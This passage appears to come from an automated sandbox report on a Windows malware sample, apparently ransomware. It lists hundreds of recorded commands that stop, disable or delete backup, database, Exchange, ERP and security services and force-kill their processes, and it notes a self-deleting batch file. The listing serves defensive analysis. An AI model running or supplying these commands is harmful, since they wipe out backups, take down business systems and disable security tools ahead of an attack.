  • '<SYSTEM32>\net.exe' stop MSExchangeThrottling
  • '<SYSTEM32>\net.exe' stop TPlusStdAppService1220
  • '<SYSTEM32>\net.exe' stop tmlisten
  • '<SYSTEM32>\net.exe' stop MSExchangeSubmission
  • '<SYSTEM32>\net.exe' stop "SQLAgent$OPTIMA"
  • '<SYSTEM32>\net.exe' stop MySQL
  • '<SYSTEM32>\net.exe' stop VeeamDistributionSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeServiceHost
  • '<SYSTEM32>\net.exe' stop MSExchangeTransport
  • '<SYSTEM32>\taskkill.exe' /IM AndroidServer.exe /F
Terminates or attempts to terminate
the following system processes:
  • <SYSTEM32>\cmd.exe
the following user processes:
  • iexplore.exe
Modifies file system
Creates the following files
  • %TEMP%\5cde.tmp\5d0e.tmp\5d0f.bat
Deletes the following files
  • %TEMP%\5cde.tmp\5d0e.tmp\5d0f.bat
Deletes itself.
Miscellaneous
Searches for the following windows
  • ClassName: '' WindowName: ''
Executes the following
  • '<SYSTEM32>\cmd.exe' /c "%TEMP%\5CDE.tmp\5D0E.tmp\5D0F.bat <Full path to file>"
  • '<SYSTEM32>\sc.exe' delete GPSMediaSvr
  • '<SYSTEM32>\sc.exe' delete BackupExecAgentAccelerator
  • '<SYSTEM32>\net1.exe' stop "MSSQL$OPTIMA"
  • '<SYSTEM32>\sc.exe' delete Mysoft.SchedulingService
  • '<SYSTEM32>\sc.exe' delete "Zabbix Agent"
  • '<SYSTEM32>\net1.exe' stop OracleDBConsoleilas
  • '<SYSTEM32>\net1.exe' stop VeeamBrokerSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangeRPC
  • '<SYSTEM32>\sc.exe' delete Mysoft.DataCenterService
  • '<SYSTEM32>\sc.exe' delete GPSFtpd
  • '<SYSTEM32>\net1.exe' stop "MSSQLFDLauncher$OPTIMA"
  • '<SYSTEM32>\sc.exe' delete Mysoft.Config.WindowsService
  • '<SYSTEM32>\net1.exe' stop MSExchangeServiceHost
  • '<SYSTEM32>\net1.exe' stop "OracleOraDb10g_homeliSQL*Plus"
  • '<SYSTEM32>\net1.exe' stop MSExchangeRepl
  • '<SYSTEM32>\sc.exe' delete GPSMysqld
  • '<SYSTEM32>\sc.exe' delete Mysoft.Autoupgrade.UpdateService
  • '<SYSTEM32>\sc.exe' delete GPSTomcat6
  • '<SYSTEM32>\net1.exe' stop CASMsgSrv
  • '<SYSTEM32>\net1.exe' stop VeeamCloudSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangePOP3BE
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$WOLTERSKLUWER"
  • '<SYSTEM32>\sc.exe' delete Mysoft.Autoupgrade.DispatchService
  • '<SYSTEM32>\sc.exe' delete GPSLoginSvr
  • '<SYSTEM32>\sc.exe' delete ErpEnvSvc
  • '<SYSTEM32>\net1.exe' stop CASVirtualDiskService
  • '<SYSTEM32>\net1.exe' stop VeeamMountSvc
  • '<SYSTEM32>\net1.exe' stop VeeamDeploySvc
  • '<SYSTEM32>\net1.exe' stop MySQL
  • '<SYSTEM32>\sc.exe' delete Mysoft.Setup.InstallService
  • '<SYSTEM32>\net1.exe' stop K3MobileServiceManage
  • '<SYSTEM32>\net1.exe' stop ClickToRunSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangeTransportLogSearch
  • '<SYSTEM32>\sc.exe' delete BackupExecManagementService
  • '<SYSTEM32>\net1.exe' stop "msftesql$SQLEXPRESS"
  • '<SYSTEM32>\sc.exe' delete ShareBoxMonitorService
  • '<SYSTEM32>\sc.exe' delete BackupExecJobEngine
  • '<SYSTEM32>\net1.exe' stop TPlusStdUpgradeService1220
  • '<SYSTEM32>\net1.exe' stop 360EntPGSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangeTransport
  • '<SYSTEM32>\sc.exe' delete savsvc
  • '<SYSTEM32>\sc.exe' delete BackupExecAgentBrowser
  • '<SYSTEM32>\net1.exe' stop TPlusStdTaskService1220
  • '<SYSTEM32>\net1.exe' stop "ReportServer$OPTIMA"
  • '<SYSTEM32>\sc.exe' delete abs_deployer
  • '<SYSTEM32>\net1.exe' stop ServiceMid
  • '<SYSTEM32>\net1.exe' stop MSExchangeThrottling
  • '<SYSTEM32>\sc.exe' delete BackupExecRPCService
  • '<SYSTEM32>\sc.exe' delete edr_monitor
  • '<SYSTEM32>\sc.exe' delete BackupExecDeviceMediaService
  • '<SYSTEM32>\net1.exe' stop TPlusStdAppService1220
  • '<SYSTEM32>\net1.exe' stop tmlisten
  • '<SYSTEM32>\net1.exe' stop MSExchangeSubmission
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$OPTIMA"
  • '<SYSTEM32>\sc.exe' delete MysoftUpdate
  • '<SYSTEM32>\sc.exe' delete bedbg
  • '<SYSTEM32>\net1.exe' stop VeeamDistributionSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangePop3
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$PROGID"
  • '<SYSTEM32>\sc.exe' delete TbossSystem
  • '<SYSTEM32>\net1.exe' stop MSExchangeImap4
  • '<SYSTEM32>\sc.exe' delete OracleRemExecService
  • '<SYSTEM32>\net1.exe' stop CASXMLService
  • '<SYSTEM32>\net1.exe' stop TPlusStdAppService1300
  • '<SYSTEM32>\net1.exe' stop MSExchangeIMAP4BE
  • '<SYSTEM32>\sc.exe' delete NFWebServer
  • '<SYSTEM32>\sc.exe' delete MediatekRegistryWriter
  • '<SYSTEM32>\sc.exe' delete QQCertificateService
  • '<SYSTEM32>\sc.exe' delete "OSP Service"
  • '<SYSTEM32>\net1.exe' stop "SQLTELEMETRY$HL"
  • '<SYSTEM32>\net1.exe' stop "AliyunService"
  • '<SYSTEM32>\net1.exe' stop VeeamTransportSvc
  • '<SYSTEM32>\sc.exe' delete wampapache
  • '<SYSTEM32>\sc.exe' delete RaAutoInstSrv_RT2870
  • '<SYSTEM32>\net1.exe' stop "TMBMServer"
  • '<SYSTEM32>\sc.exe' delete LPManager
  • '<SYSTEM32>\sc.exe' delete 360EntClientSvc
  • '<SYSTEM32>\sc.exe' delete "FontCache3.0.0.0"
  • '<SYSTEM32>\net1.exe' stop "Alibaba Security Aegis Update Service"
  • '<SYSTEM32>\net1.exe' stop VeeanBackupSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangeHMRecovery
  • '<SYSTEM32>\sc.exe' delete vmware-converter-server
  • '<SYSTEM32>\sc.exe' delete BestSyncSvc
  • '<SYSTEM32>\sc.exe' delete 360EntSvc
  • '<SYSTEM32>\sc.exe' delete LMS
  • '<SYSTEM32>\net1.exe' stop "MSSQLFDLauncher"
  • '<SYSTEM32>\sc.exe' delete vmware-converter-worker
  • '<SYSTEM32>\sc.exe' delete GPSDaemon
  • '<SYSTEM32>\sc.exe' delete GPSGatewaySvr
  • '<SYSTEM32>\sc.exe' delete CobianBackup10
  • '<SYSTEM32>\sc.exe' delete OracleMTSRecoveryService
  • '<SYSTEM32>\sc.exe' delete CASLicenceServer
  • '<SYSTEM32>\net1.exe' stop iNethinkSQLBackupSvc
  • '<SYSTEM32>\net1.exe' stop VeeamNFSSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangeNotificationsBroker
  • '<SYSTEM32>\sc.exe' delete semwebsrv
  • '<SYSTEM32>\sc.exe' delete GPSDataProcSvr
  • '<SYSTEM32>\net1.exe' stop "MSSQL$WOLTERSKLUWER"
  • '<SYSTEM32>\net1.exe' stop DDNSService
  • '<SYSTEM32>\net1.exe' stop TPlusStdWebService1300
  • '<SYSTEM32>\net1.exe' stop MSExchangeMailboxReplication
  • '<SYSTEM32>\sc.exe' delete SQLService
  • '<SYSTEM32>\sc.exe' delete OracleDBConcoleorcl
  • '<SYSTEM32>\sc.exe' delete GPSStorageSvr
  • '<SYSTEM32>\sc.exe' delete "SyncBASE Service"
  • '<SYSTEM32>\sc.exe' delete MSSEARCH
  • '<SYSTEM32>\sc.exe' delete GPSDownSvr
  • '<SYSTEM32>\net1.exe' stop RapService
  • '<SYSTEM32>\net1.exe' stop TPlusStdUpgradeService1300
  • '<SYSTEM32>\net1.exe' stop MSExchangeMailboxAssistants
  • '<SYSTEM32>\net1.exe' stop "MSSQL$PROGID"
  • '<SYSTEM32>\sc.exe' delete SQLANYs_sem5
  • '<SYSTEM32>\sc.exe' delete msftesql
  • '<SYSTEM32>\sc.exe' delete GPSUserSvr
  • '<SYSTEM32>\net1.exe' stop AGSService
  • '<SYSTEM32>\net1.exe' stop TPlusStdTaskService1300
  • '<SYSTEM32>\net1.exe' stop MSExchangeIS
  • '<SYSTEM32>\net1.exe' stop "ReportServer"
  • '<SYSTEM32>\net1.exe' stop "MSSQLSERVER"
  • '<SYSTEM32>\sc.exe' delete ShareBoxService
  • '<SYSTEM32>\sc.exe' delete RemoteAssistService
  • '<SYSTEM32>\net1.exe' stop NFOTPService
  • '<SYSTEM32>\net1.exe' stop U8DispatchService
  • '<SYSTEM32>\net1.exe' stop NFSysService
  • '<SYSTEM32>\net1.exe' stop TurboCRM70
  • '<SYSTEM32>\net1.exe' stop DGPNPSEV
  • '<SYSTEM32>\net1.exe' stop SentinelKeysServer
  • '<SYSTEM32>\net1.exe' stop AgentX
  • '<SYSTEM32>\net1.exe' stop "ABBYY.Licensing.FineReader.Professional.12.0"
  • '<SYSTEM32>\sc.exe' delete "U8WorkerService1"
  • '<SYSTEM32>\net1.exe' stop Mysoft.SchedulingService
  • '<SYSTEM32>\net1.exe' stop "Apple Mobile Device Service"
  • '<SYSTEM32>\sc.exe' delete UTUService
  • '<SYSTEM32>\net1.exe' stop KugouService
  • '<SYSTEM32>\sc.exe' delete UFReportService
  • '<SYSTEM32>\net1.exe' stop GNWebService
  • '<SYSTEM32>\sc.exe' delete MSCRMAsyncService$maintenance
  • '<SYSTEM32>\sc.exe' delete UFAllNet
  • '<SYSTEM32>\net1.exe' stop U8SendMailAdmin
  • '<SYSTEM32>\net1.exe' stop CobianBackup10
  • '<SYSTEM32>\sc.exe' delete MSCRMUnzipService
  • '<SYSTEM32>\sc.exe' delete "U8WebPool"
  • '<SYSTEM32>\sc.exe' delete NscAuthService
  • '<SYSTEM32>\sc.exe' delete U8TaskService
  • '<SYSTEM32>\net1.exe' stop pcas
  • '<SYSTEM32>\net1.exe' stop RTCAVMCU
  • '<SYSTEM32>\sc.exe' delete MASTER
  • '<SYSTEM32>\net1.exe' stop "Bonjour Service"
  • '<SYSTEM32>\sc.exe' delete U8SLReportService
  • '<SYSTEM32>\net1.exe' stop U8EISService
  • '<SYSTEM32>\sc.exe' delete "ReportServer$SQLEXPRESS"
  • '<SYSTEM32>\net1.exe' stop SBOMail
  • '<SYSTEM32>\net1.exe' stop SBOJobServiceBackEnd
  • '<SYSTEM32>\net1.exe' stop SBODI_Server
  • '<SYSTEM32>\net1.exe' stop SBOClientAgent
  • '<SYSTEM32>\net1.exe' stop SAPB1iEventSender
  • '<SYSTEM32>\net1.exe' stop "SAPB1iDIProxy_Monitor"
  • '<SYSTEM32>\net1.exe' stop SAPB1iDIProxy
  • '<SYSTEM32>\net1.exe' stop "SAP Business One RSP Agent Service"
  • '<SYSTEM32>\net1.exe' stop cbVSCService
  • '<SYSTEM32>\net1.exe' stop "SQLBackupAndFTP Client Service"
  • '<SYSTEM32>\sc.exe' delete CobianBackup11
  • '<SYSTEM32>\sc.exe' delete cbVSCService11
  • '<SYSTEM32>\sc.exe' delete "SQL Server Reporting Services"
  • '<SYSTEM32>\net1.exe' stop U8EncryptService
  • '<SYSTEM32>\sc.exe' delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai"
  • '<SYSTEM32>\net1.exe' stop UFNet
  • '<SYSTEM32>\net1.exe' stop UTUService
  • '<SYSTEM32>\net1.exe' stop UFReportService
  • '<SYSTEM32>\net1.exe' stop UFAllNet
  • '<SYSTEM32>\net1.exe' stop U8WebPool
  • '<SYSTEM32>\net1.exe' stop U8TaskService
  • '<SYSTEM32>\net1.exe' stop U8SLReportService
  • '<SYSTEM32>\net1.exe' stop U8SCMPool
  • '<SYSTEM32>\net1.exe' stop U8MPool
  • '<SYSTEM32>\net1.exe' stop U8KeyManagePool
  • '<SYSTEM32>\net1.exe' stop U8GCService
  • '<SYSTEM32>\sc.exe' delete TongBackupSrv
  • '<SYSTEM32>\net1.exe' stop NFVPrintServer
  • '<SYSTEM32>\sc.exe' delete U8SCMPool
  • '<SYSTEM32>\net1.exe' stop JWService
  • '<SYSTEM32>\sc.exe' delete EASService
  • '<SYSTEM32>\sc.exe' config "SQLTELEMETRY" start= disabled
  • '<SYSTEM32>\net1.exe' stop AutoUpdatePatchService
  • '<SYSTEM32>\net1.exe' stop NFLicenceServer
  • '<SYSTEM32>\sc.exe' delete Serv-U
  • '<SYSTEM32>\sc.exe' config "SQLBrowser" start= disabled
  • '<SYSTEM32>\sc.exe' delete KICkSvr
  • '<SYSTEM32>\sc.exe' delete YunService
  • '<SYSTEM32>\net1.exe' stop ImtsEventSvr
  • '<SYSTEM32>\net1.exe' stop d_safe
  • '<SYSTEM32>\net1.exe' stop MySQL5_OA
  • '<SYSTEM32>\sc.exe' config "SQLSERVERAGENT" start= disabled
  • '<SYSTEM32>\net1.exe' stop OMAILREPORT
  • '<SYSTEM32>\sc.exe' delete U8SmsSrv
  • '<SYSTEM32>\net1.exe' stop "NetVault Process Manager"
  • '<SYSTEM32>\net1.exe' stop DDVRulesProcessor
  • '<SYSTEM32>\net1.exe' stop AngelOfDeath
  • '<SYSTEM32>\net1.exe' stop MSExchangeUMCR
  • '<SYSTEM32>\sc.exe' config "MSSQLFDLauncher" start= disabled
  • '<SYSTEM32>\sc.exe' delete Gailun_Downloader
  • '<SYSTEM32>\sc.exe' delete "U8WorkerService2"
  • '<SYSTEM32>\sc.exe' delete TxQBService
  • '<SYSTEM32>\net1.exe' stop "FileZilla Server"
  • '<SYSTEM32>\net1.exe' stop RavTask
  • '<SYSTEM32>\net1.exe' stop MSExchangeUM
  • '<SYSTEM32>\net1.exe' stop "postgresql-x64-9.4"
  • '<SYSTEM32>\sc.exe' delete CIS
  • '<SYSTEM32>\sc.exe' delete "Rpc Monitor"
  • '<SYSTEM32>\sc.exe' delete RTCASMCU
  • '<SYSTEM32>\sc.exe' delete MDM
  • '<SYSTEM32>\sc.exe' delete "EasyFZS Server"
  • '<SYSTEM32>\sc.exe' delete "U8MPool"
  • '<SYSTEM32>\net1.exe' stop ceng_web_svc_d
  • '<SYSTEM32>\net1.exe' stop K3ClouManager
  • '<SYSTEM32>\sc.exe' delete RtcSrv
  • '<SYSTEM32>\sc.exe' delete U8KeyManagePool
  • '<SYSTEM32>\net1.exe' stop KpService
  • '<SYSTEM32>\net1.exe' stop EvtSys
  • '<SYSTEM32>\sc.exe' delete OfficeUpdateService
  • '<SYSTEM32>\sc.exe' delete U8GCService
  • '<SYSTEM32>\sc.exe' delete asComSvc
  • '<SYSTEM32>\sc.exe' delete U8EncryptService
  • '<SYSTEM32>\net1.exe' stop K3MMainSuspendService
  • '<SYSTEM32>\net1.exe' stop IngressMgr
  • '<SYSTEM32>\sc.exe' delete "Daemon Service"
  • '<SYSTEM32>\sc.exe' delete U8EISService
  • '<SYSTEM32>\net1.exe' stop DFServ
  • '<SYSTEM32>\net1.exe' stop SupportAssistAgent
  • '<SYSTEM32>\sc.exe' delete "Nuo Update Monitor"
  • '<SYSTEM32>\sc.exe' delete U8DispatchService
  • '<SYSTEM32>\sc.exe' config "SSISTELEMETRY130" start= disabled
  • '<SYSTEM32>\net1.exe' stop "Dell Hardware Support"
  • '<SYSTEM32>\net1.exe' stop RavService
  • '<SYSTEM32>\sc.exe' delete TurboCRM70
  • '<SYSTEM32>\sc.exe' delete OpenFastAssist
  • '<SYSTEM32>\sc.exe' config "MsDtsServer130" start= disabled
  • '<SYSTEM32>\sc.exe' delete OfficeClearCache
  • '<SYSTEM32>\sc.exe' delete CloudExchangeService
  • '<SYSTEM32>\sc.exe' delete vmware-converter-agent
  • '<SYSTEM32>\sc.exe' delete "FlexNet Licensing Service 64"
  • '<SYSTEM32>\sc.exe' delete 360EntHttpServer
  • '<SYSTEM32>\sc.exe' config "MSSQLServerADHelper100" start= disabled
  • '<SYSTEM32>\sc.exe' delete JhTask
  • '<SYSTEM32>\net1.exe' stop UFIDAWebService
  • '<SYSTEM32>\net1.exe' stop XenSvc
  • '<SYSTEM32>\net1.exe' stop VMAuthdService
  • '<SYSTEM32>\sc.exe' config "MSSQLServerOLAPService" start= disabled
  • '<SYSTEM32>\sc.exe' delete K3MobileService
  • '<SYSTEM32>\sc.exe' delete RTCMEETINGMCU
  • '<SYSTEM32>\sc.exe' delete ftusbrdwks
  • '<SYSTEM32>\sc.exe' delete MSSQLSERVER
  • '<SYSTEM32>\net1.exe' stop SQLSERVERAGENT
  • '<SYSTEM32>\net1.exe' stop "MsDtsServer130"
  • '<SYSTEM32>\sc.exe' delete QcSoftService
  • '<SYSTEM32>\sc.exe' config SQLSERVERAGENT start=disabled
  • '<SYSTEM32>\sc.exe' delete FxService
  • '<SYSTEM32>\net1.exe' stop xenlite
  • '<SYSTEM32>\net1.exe' stop Apache2.4
  • '<SYSTEM32>\sc.exe' delete UI0Detect
  • '<SYSTEM32>\sc.exe' delete MSSQLFDLauncher
  • '<SYSTEM32>\sc.exe' delete "UtilDev Web Server Pro"
  • '<SYSTEM32>\sc.exe' delete RtcQms
  • '<SYSTEM32>\sc.exe' delete aspnet_state @sc delete Redis
  • '<SYSTEM32>\sc.exe' config "SQLAgent" start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$ start=disabled
  • '<SYSTEM32>\sc.exe' delete EnergyDataService
  • '<SYSTEM32>\sc.exe' delete SQLBrowser
  • '<SYSTEM32>\net1.exe' stop VMUSBArbService
  • '<SYSTEM32>\net1.exe' stop "ReportServer$SHOPCONTROL9"
  • '<SYSTEM32>\sc.exe' delete RTCIMMCU
  • '<SYSTEM32>\net1.exe' stop "SQLTELEMETRY"
  • '<SYSTEM32>\sc.exe' delete MCService
  • '<SYSTEM32>\net1.exe' stop MSExchangeADTopology
  • '<SYSTEM32>\net1.exe' stop "Synology Drive VSS Service x64"
  • '<SYSTEM32>\net1.exe' stop WebAttendServer
  • '<SYSTEM32>\sc.exe' config "SQLTELEMETRY$HL" start= disabled
  • '<SYSTEM32>\sc.exe' config SQLBrowser start=disabled
  • '<SYSTEM32>\sc.exe' delete UIODetect
  • '<SYSTEM32>\sc.exe' delete RTCCDR
  • '<SYSTEM32>\sc.exe' delete "ZTE USBIP Client"
  • '<SYSTEM32>\sc.exe' delete VMTools
  • '<SYSTEM32>\sc.exe' delete XT800Service_Personal
  • '<SYSTEM32>\sc.exe' delete ftusbrdsrv
  • '<SYSTEM32>\net1.exe' stop "NetBackup Discovery Framework"
  • '<SYSTEM32>\sc.exe' config "ReportServer" start= disabled
  • '<SYSTEM32>\net1.exe' stop MSComplianceAudit
  • '<SYSTEM32>\net1.exe' stop Apache2.2
  • '<SYSTEM32>\net1.exe' stop wanxiao-monitor
  • '<SYSTEM32>\sc.exe' delete WebAttendServer
  • '<SYSTEM32>\sc.exe' delete RTCDATAMCU
  • '<SYSTEM32>\sc.exe' delete "ZTE USBIP Client Guard"
  • '<SYSTEM32>\sc.exe' delete MSSQLServerOLAPService
  • '<SYSTEM32>\net1.exe' stop "SSISTELEMETRY130"
  • '<SYSTEM32>\sc.exe' delete ImeDictUpdateService
  • '<SYSTEM32>\sc.exe' config "MsDtsServer100" start= disabled
  • '<SYSTEM32>\sc.exe' delete TCPIDDAService
  • '<SYSTEM32>\net1.exe' stop SQLBrowser
  • '<SYSTEM32>\net1.exe' stop "NetBackup Client Service"
  • '<SYSTEM32>\net1.exe' stop "MSSQLFDLauncher$SHOPCONTROL9"
  • '<SYSTEM32>\sc.exe' delete RTCAVMCU
  • '<SYSTEM32>\sc.exe' config MSSQLSERVER start=disabled
  • '<SYSTEM32>\sc.exe' delete OracleOraDb11g_home1ClrAgent
  • '<SYSTEM32>\sc.exe' config "SQLWriter" start= disabled
  • '<SYSTEM32>\net1.exe' stop "SQLSERVERAGENT"
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @t...
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill...
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_ma...
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & ...
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM Veeam.Backup...
  • '<SYSTEM32>\cmd.exe' /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer ...
  • '<SYSTEM32>\cmd.exe' /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Servi...
  • '<SYSTEM32>\sc.exe' delete "UWS LoPriv Services"
  • '<SYSTEM32>\cmd.exe' /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop ...
  • '<SYSTEM32>\cmd.exe' /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDA...
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusb...
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc ...
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc d...
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete Qc...
  • '<SYSTEM32>\cmd.exe' /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement...
  • '<SYSTEM32>\cmd.exe' /c "color b & @taskkill /IM Tomcat7w.exe /F & @taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F & @taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F & @taskkill /IM Launchpad.exe /F & @taskkil...
  • '<SYSTEM32>\cmd.exe' /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" ...
  • '<SYSTEM32>\cmd.exe' /c "color b & taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe & taskkill /F /IM Veeam.Backup.BrokerService.exe & taskkill /F /IM Veeam.Backup.CatalogDataService.exe & taskkill /F /I...
  • '<SYSTEM32>\cmd.exe' /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc confi...
  • '<SYSTEM32>\cmd.exe' /c "color b & sc config "SQLWriter" start= disabled & sc config "MSSQL$VEEAMSQL2012" start= disabled & sc config "SQLAgent$VEEAMSQL2012" start= disabled & sc config "MSSQL" start= disabled & sc...
  • '<SYSTEM32>\cmd.exe' /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAM...
  • '<SYSTEM32>\cmd.exe' /c "color b & @taskkill /IM ReportingServicesService.exe /F & @sc delete "SQL Server Reporting Services" & @sc delete MSSQLFDLauncher & @taskkill /IM U8CEServer.exe /F & @taskkill /IM ServerNT....
  • '<SYSTEM32>\sc.exe' delete "XT800Service_Personal"
  • '<SYSTEM32>\sc.exe' delete "DAService_TCP"
  • '<SYSTEM32>\sc.exe' delete MSCRMAsyncService
  • '<SYSTEM32>\net1.exe' stop U8WorkerService1
  • '<SYSTEM32>\net1.exe' stop TeamViewer8
  • '<SYSTEM32>\net1.exe' stop "igfxCUIService2.0.0.0"
  • '<SYSTEM32>\net1.exe' stop Realtek11nSU
  • '<SYSTEM32>\net1.exe' stop "memcached Server"
  • '<SYSTEM32>\sc.exe' config "MSSQL" start= disabled
  • '<SYSTEM32>\net1.exe' stop MSSQL$
  • '<SYSTEM32>\sc.exe' delete eCardMPService
  • '<SYSTEM32>\sc.exe' delete SQLWriter
  • '<SYSTEM32>\sc.exe' delete ftnlses3
  • '<SYSTEM32>\sc.exe' delete RTCATS
  • '<SYSTEM32>\sc.exe' delete OracleVssWriterORCL
  • '<SYSTEM32>\sc.exe' config "SQLAgent$VEEAMSQL2012" start= disabled
  • '<SYSTEM32>\net1.exe' stop "MSSQL$SHOPCONTROL9"
  • '<SYSTEM32>\net1.exe' stop VMwareHostd
  • '<SYSTEM32>\net1.exe' stop U8WorkerService2
  • '<SYSTEM32>\sc.exe' delete OracleServiceORCL
  • '<SYSTEM32>\sc.exe' delete "eCard-TTransServer"
  • '<SYSTEM32>\sc.exe' delete SQLSERVERAGENT
  • '<SYSTEM32>\sc.exe' delete ftnlsv3
  • '<SYSTEM32>\sc.exe' config "SQL Server (MSSQLSERVER)" start=disabled
  • '<SYSTEM32>\net1.exe' stop "SQLBrowser"
  • '<SYSTEM32>\sc.exe' delete REPLICA
  • '<SYSTEM32>\sc.exe' delete OracleOraDb11g_home1TNSListener
  • '<SYSTEM32>\sc.exe' config "MSSQL$VEEAMSQL2012" start= disabled
  • '<SYSTEM32>\net1.exe' stop "MSOLAP$SHOPCONTROL9"
  • '<SYSTEM32>\net1.exe' stop UIODetect
  • '<SYSTEM32>\net1.exe' stop HaoZipSvc
  • '<SYSTEM32>\net1.exe' stop "SQLWrite"
  • '<SYSTEM32>\sc.exe' delete VGAuthService
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$SHOPCONTROL9"
  • '<SYSTEM32>\sc.exe' delete "ZTE FileTranS"
  • '<SYSTEM32>\net1.exe' stop SQLANYs_Sage_FAS_Fixed_Assets
  • '<SYSTEM32>\sc.exe' delete Jenkins
  • '<SYSTEM32>\net1.exe' stop CASLicenceServer
  • '<SYSTEM32>\net1.exe' stop RapidRecoveryAgent
  • '<SYSTEM32>\net1.exe' stop MSExchangeFastSearch
  • '<SYSTEM32>\sc.exe' delete KuaiYunTools
  • '<SYSTEM32>\sc.exe' delete ADWS
  • '<SYSTEM32>\sc.exe' delete secbizsrv
  • '<SYSTEM32>\sc.exe' delete MSSQL$SQL2008
  • '<SYSTEM32>\net1.exe' stop "MSSQLServerADHelper100"
  • '<SYSTEM32>\net1.exe' stop MSSQL$RE_EXPRESS
  • '<SYSTEM32>\sc.exe' delete MsDtsServer100
  • '<SYSTEM32>\sc.exe' delete AppFabricCachingService
  • '<SYSTEM32>\sc.exe' delete MotionBoard57
  • '<SYSTEM32>\sc.exe' delete SQLAgent$SQL2008
  • '<SYSTEM32>\sc.exe' delete SQLTELEMETRY
  • '<SYSTEM32>\net1.exe' stop Service2
  • '<SYSTEM32>\net1.exe' stop MSExchangeEdgeSync
  • '<SYSTEM32>\sc.exe' delete IpOverUsbSvc
  • '<SYSTEM32>\sc.exe' delete c2wts
  • '<SYSTEM32>\sc.exe' delete apachezt
  • '<SYSTEM32>\sc.exe' delete SSSyncService
  • '<SYSTEM32>\sc.exe' config MSSQL$FE_EXPRESS start= disabled
  • '<SYSTEM32>\net1.exe' stop "SQLAgent"
  • '<SYSTEM32>\sc.exe' delete OracleJobSchedulerORCL
  • '<SYSTEM32>\sc.exe' delete ProjectCalcService16
  • '<SYSTEM32>\sc.exe' delete eSightService
  • '<SYSTEM32>\net1.exe' stop QPCore
  • '<SYSTEM32>\sc.exe' delete KMSELDI
  • '<SYSTEM32>\sc.exe' delete jhi_service
  • '<SYSTEM32>\sc.exe' delete SSMonitorService
  • '<SYSTEM32>\sc.exe' delete ProjectEventService16
